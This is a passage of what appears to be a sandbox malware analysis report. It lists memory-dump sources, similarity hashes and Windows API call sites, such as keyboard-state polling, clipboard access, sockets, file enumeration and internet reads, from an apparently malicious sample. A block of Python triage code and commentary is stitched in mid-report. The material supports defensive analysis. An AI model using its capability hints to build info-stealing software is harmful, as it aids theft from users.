• CloseClipboard.USER32 ref: 0046C866
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: Clipboard$CloseGlobal$AvailableDataFormatLock$OpenUnlock
• String ID: HH
• API String ID: 589737431-2761332787
• Opcode ID: 76419e0badb028214ed7bad9e924c36871e80023f9f647d131bfc03e45e064d3
• Instruction ID: 5556deb4c8197336e1b92b5e2a85e957832ef7964462d916cb468ff193882e13
• Opcode Fuzzy Hash: 76419e0badb028214ed7bad9e924c36871e80023f9f647d131bfc03e45e064d3
• Instruction Fuzzy Hash: 7301F5762042005FC300AFB9ED45B6A7BA4EF59704F04097FF980A72C1EBB1E915C7AA
APIs
• __wcsicoll.LIBCMT ref: 0043643C
• mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 00436452
• __wcsicoll.LIBCMT ref: 00436466
• mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043647C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: __wcsicollmouse_event
• String ID: DOWN
• API String ID: 1033544147-711622031
• Opcode ID: 8e71a22f1bb6dc727f393f419cee3c46fab46d9365d91d475c80ba63e0095046
• Instruction ID: 8a73d33e481528181e274ae5662561dddcd8f7088196b39fde8242b6fe69d79f
• Opcode Fuzzy Hash: 8e71a22f1bb6dc727f393f419cee3c46fab46d9365d91d475c80ba63e0095046
• Instruction Fuzzy Hash: 75E0927558872039FC4036253C02FFB174CAB66796F018116FE00D1291EA586D865BBD
APIs
  • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
• socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 00474213
• WSAGetLastError.WSOCK32(00000000), ref: 00474233
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: ErrorLastinet_addrsocket
• String ID:
• API String ID: 4170576061-0
• Opcode ID: c11ce247c64ee683b380b6a697379cd3ea863651eb179087c325b129d43524e0
• Instruction ID: 44a7e99483396e6262e636993c5e510db402c36a24f0b6146f21617b09e75fab
• Opcode Fuzzy Hash: c11ce247c64ee683b380b6a697379cd3ea863651eb179087c325b129d43524e0
• Instruction Fuzzy Hash: B6412C7164030067E720BB3A8C83F5A72D89F40728F144D5EF954BB2C3D6BAAD45475D
APIs
• GetCursorPos.USER32(004A83D8), ref: 0045636A
• ScreenToClient.USER32(004A83D8,?), ref: 0045638A
• GetAsyncKeyState.USER32(?), ref: 004563D0
• GetAsyncKeyState.USER32(?), ref: 004563DC
• GetWindowLongW.USER32(?,000000F0), ref: 00456430
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3539004672-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 0eacbf52c9ff4b21db6d2500407d28a57be55752a0539e191fb639d8ee6a043b
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E416071108341ABD724DF55CD84EBBB7E9EF86725F540B0EB8A543281C734A848CB6A
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                                                                                                                                                                                                                                                                                                                                                                • IsWindowVisible.USER32 ref: 00477314
                                                                                                                                                                                                                                                                                                                                                                                                                • IsWindowEnabled.USER32 ref: 00477324
                                                                                                                                                                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32(?,?,?,00000001,?,?), ref: 00477331
                                                                                                                                                                                                                                                                                                                                                                                                                • IsIconic.USER32 ref: 0047733F
                                                                                                                                                                                                                                                                                                                                                                                                                • IsZoomed.USER32 ref: 0047734D
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 292994002-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: c753cb395bd8887e5e04db90522a3107d7308fd2cfa588f53a4db7a4177bc043
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 351172327041119BE3209B26DD05B9FB7A8AF91310F05882EFC49E7250D7B8EC42D7A9
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000,75923220,00000000,00000000,00442E95,?,?,?), ref: 00436D4F
                                                                                                                                                                                                                                                                                                                                                                                                                • SetFileTime.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 00436D8C
                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 00436D93
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: File$CloseCreateHandleTime
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3397143404-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 17e11168520f802dddbe8c477e19047108492bf153e6cd976562f268bfda3e60
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: bce1a9391340f9688fe0750810cd2cb1b104417d8b3c1e96578cdf6de8724fbd
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 17e11168520f802dddbe8c477e19047108492bf153e6cd976562f268bfda3e60
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A4F0C83634132077E5301A69AC8DFCF276CABDAB32F20452EF741A61C083D51445977D
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: _strncmp
• String ID: ACCEPT$^$h
• API String ID: 909875538-4263704089
• Opcode ID: adbbb77bd847cefbadd23aa8e42bde8f813033e7c46a43322acc698efb747d92
• Instruction ID: 72a2cba82410d8b1d90f72ff5cad5771b474d57714a55a9933f2c727144888ce
• Opcode Fuzzy Hash: adbbb77bd847cefbadd23aa8e42bde8f813033e7c46a43322acc698efb747d92
• Instruction Fuzzy Hash: AE22A0746083818FE725CF29C48076BBBE2BFC9304F24896EE8D587351D779984ACB56
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID:
• String ID: ERCP$VUUU$VUUU$VUUU
• API String ID: 0-2165971703
• Opcode ID: fe5f619ecbbb89e409f3ebcf557090f4afc22d0cdf4dbad8df8e547bb5c0b5b7
• Instruction ID: 514654dd073cfe12bfc68f6c44a091d7a3824994b709b832431b3f3de6bbd106
• Opcode Fuzzy Hash: fe5f619ecbbb89e409f3ebcf557090f4afc22d0cdf4dbad8df8e547bb5c0b5b7
• Instruction Fuzzy Hash: 5562D3716087818BE734CF18C8807ABB7E1EBC6314F154A2FE49986390E779D949CB5B
APIs
• FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045C9BE
• FindNextFileW.KERNEL32(00000000,?), ref: 0045CA1B
• FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CA4A
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: Find$File$CloseFirstNext
• String ID:
• API String ID: 3541575487-0
• Opcode ID: cd42767256c3935660832567e39f7af9e021373ba4cf75ddba00705dd7020de4
• Instruction ID: 18858b47483a38653cd59612877c1399ad483e9f26b014a4aa46912757e3bc7b
• Opcode Fuzzy Hash: cd42767256c3935660832567e39f7af9e021373ba4cf75ddba00705dd7020de4
• Instruction Fuzzy Hash: EC41CE756003009FC720EF79D880A9BB3E4FF89315F208A6EED698B391D775A844CB95
APIs
• GetFileAttributesW.KERNEL32(00000001,00000000), ref: 00436AEF
• FindFirstFileW.KERNEL32(00000001,?), ref: 00436B00
• FindClose.KERNEL32(00000000), ref: 00436B13
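The two `APIs` entries above list the call sites Joe Sandbox resolved in two functions of the dumped image: a FindFirstFileW / FindNextFileW / FindClose loop (a directory walk) and a GetFileAttributesW / FindFirstFileW / FindClose sequence (a single-path existence check). As an added example, not code from the report or from Joe Sandbox, the Python below parses lines in exactly this `Api.MODULE(args), ref: ADDR` format, turns each `ref:` address into an RVA against the `Offset: 00400000` image base stated in the Memory Dump Source entries, and tags the two API combinations. The regex, the pattern names and the classification rules are assumptions of the example; the sample lines are copied from this page.

```python
import re
from dataclasses import dataclass

# Image base taken from "Offset: 00400000" in the Memory Dump Source entries on this page.
IMAGE_BASE = 0x00400000

# One Joe Sandbox "APIs" line: Api.MODULE(args), ref: ADDR  or  Api.MODULE ref: ADDR (assumed shape).
API_LINE = re.compile(
    r"^(?P<api>\w+)\.(?P<module>\w+)"        # FindFirstFileW.KERNEL32, __time64.LIBCMT, ...
    r"(?:\((?P<args>[^)]*)\))?"              # argument list as printed by the sandbox, if any
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"   # call-site virtual address inside the dump
)

# Call-site combinations worth tagging during triage (pattern names are this example's own).
PATTERNS = {
    # FindFirstFile + FindNextFile + FindClose: iterates a directory, typical of a file grabber.
    "directory_enumeration": {"FindFirstFileW", "FindNextFileW", "FindClose"},
    # GetFileAttributes + FindFirstFile + FindClose without FindNextFile: tests a single path.
    "path_existence_check": {"GetFileAttributesW", "FindFirstFileW", "FindClose"},
}


@dataclass(frozen=True)
class ApiRef:
    api: str
    module: str
    args: tuple
    ref: int  # virtual address of the call site

    @property
    def rva(self) -> int:
        # Relative virtual address: what you would look up in the PE on disk / in IDA.
        return self.ref - IMAGE_BASE


def parse_api_lines(text: str) -> list:
    """Parse a block of 'APIs' lines into ApiRef records; rejects lines in an unknown shape."""
    refs = []
    for raw in text.splitlines():
        line = raw.strip().lstrip("• ").strip()  # tolerate the bullet the report renders
        if not line:
            continue
        m = API_LINE.match(line)
        if not m:
            raise ValueError(f"unrecognised API line: {line!r}")
        args = tuple(a.strip() for a in m.group("args").split(",")) if m.group("args") else ()
        ref = int(m.group("ref"), 16)
        if ref < IMAGE_BASE:
            raise ValueError(f"call site {ref:#x} lies below the image base {IMAGE_BASE:#x}")
        refs.append(ApiRef(m.group("api"), m.group("module"), args, ref))
    return refs


def classify(refs: list) -> list:
    """Return the pattern names whose API set is fully present in one function's call sites."""
    names = {r.api for r in refs}
    hits = []
    if PATTERNS["directory_enumeration"] <= names:
        hits.append("directory_enumeration")
    if PATTERNS["path_existence_check"] <= names and "FindNextFileW" not in names:
        hits.append("path_existence_check")
    return hits


# Sample input copied from the two "APIs" entries above and the one that follows them.
ENUM_FUNCTION = """
• FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045C9BE
• FindNextFileW.KERNEL32(00000000,?), ref: 0045CA1B
• FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CA4A
"""
EXISTS_FUNCTION = """
• GetFileAttributesW.KERNEL32(00000001,00000000), ref: 00436AEF
• FindFirstFileW.KERNEL32(00000001,?), ref: 00436B00
• FindClose.KERNEL32(00000000), ref: 00436B13
"""
TIME_FUNCTION = "• __time64.LIBCMT ref: 004433A2\n"

if __name__ == "__main__":
    for label, block in (("enum", ENUM_FUNCTION), ("exists", EXISTS_FUNCTION), ("time", TIME_FUNCTION)):
        refs = parse_api_lines(block)
        sites = ", ".join(f"{r.api}@{r.rva:#x}" for r in refs)
        print(f"{label}: {sites} -> {classify(refs) or ['no pattern']}")
```

A directory walk on its own is ordinary program behaviour; the tag is a triage hint that tells you which function to open at the printed RVA, and it only becomes meaningful alongside the stealer detections listed at the top of the report.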
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: FileFind$AttributesCloseFirst
• String ID:
• API String ID: 48322524-0
• Opcode ID: 9dc85b775151a348b3ed896f2b5842869c214baa03f23a1e311506cc1954de59
• Instruction ID: 417b6d6de692ea6945bae3bf725251b28653fd5bce93257cef0f58e2a105c1b1
• Opcode Fuzzy Hash: 9dc85b775151a348b3ed896f2b5842869c214baa03f23a1e311506cc1954de59
• Instruction Fuzzy Hash: 23E02236804418678600AB7CAC0C4EE779CDB0A335F100B96FE38C21D0D775A9408FEA
APIs
• __time64.LIBCMT ref: 004433A2
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Time$FileSystem__aulldiv__time64
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: rJ
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2893107130-1865492326
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: e603e75d0767fd135478995c8e8d26e9f594f0c4df67822259ddb38eb763753e
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: ebc1a5536eae3429eadb0b33e849de59894c076497330b79c1ff8485d89898ec
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e603e75d0767fd135478995c8e8d26e9f594f0c4df67822259ddb38eb763753e
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B721A2336205108BF321CF36CC41652B7E7EBE0314F268A6AE4A5973C5CA797906CB98
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • __time64.LIBCMT ref: 004433A2
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Time$FileSystem__aulldiv__time64
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: rJ
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2893107130-1865492326
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: e8e365b2ab883cc854990c78a2143569adcb81f7322f31e235de15ec19987b7e
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 4b4e0c3debee0a45c2bc781276f994e79ac96c452fb6cf924f1e6ade5adf298d
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e8e365b2ab883cc854990c78a2143569adcb81f7322f31e235de15ec19987b7e
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E82187336345108BF321CF36CC4165277E3EBE0314B258B6AD4A5973C5CA797906CB88
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • InternetQueryDataAvailable.WININET(?,?,?,?,00000000,00000000), ref: 004428C2
                                                                                                                                                                                                                                                                                                                                                                                                                • InternetReadFile.WININET(?,00000000,?,?), ref: 004428F9
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
• API String ID: 901099227-0
• Opcode ID: 0771251b70b9bd68c35fac6f7da5b5f16004994504cb59d35d549d3fc14a9ba4
• Instruction ID: 2c15810e60b1cb59304632cc8162977c32d0240baa2dcf3c2cd6ef22f942a6bb
• Opcode Fuzzy Hash: 0771251b70b9bd68c35fac6f7da5b5f16004994504cb59d35d549d3fc14a9ba4
• Instruction Fuzzy Hash: 452174B12043016BF220EF56DD45FAFB3E8ABD4715F40492EF285A6180D7B8E949C76A
APIs
• FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045DDA1
• FindClose.KERNEL32(00000000), ref: 0045DDDD
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
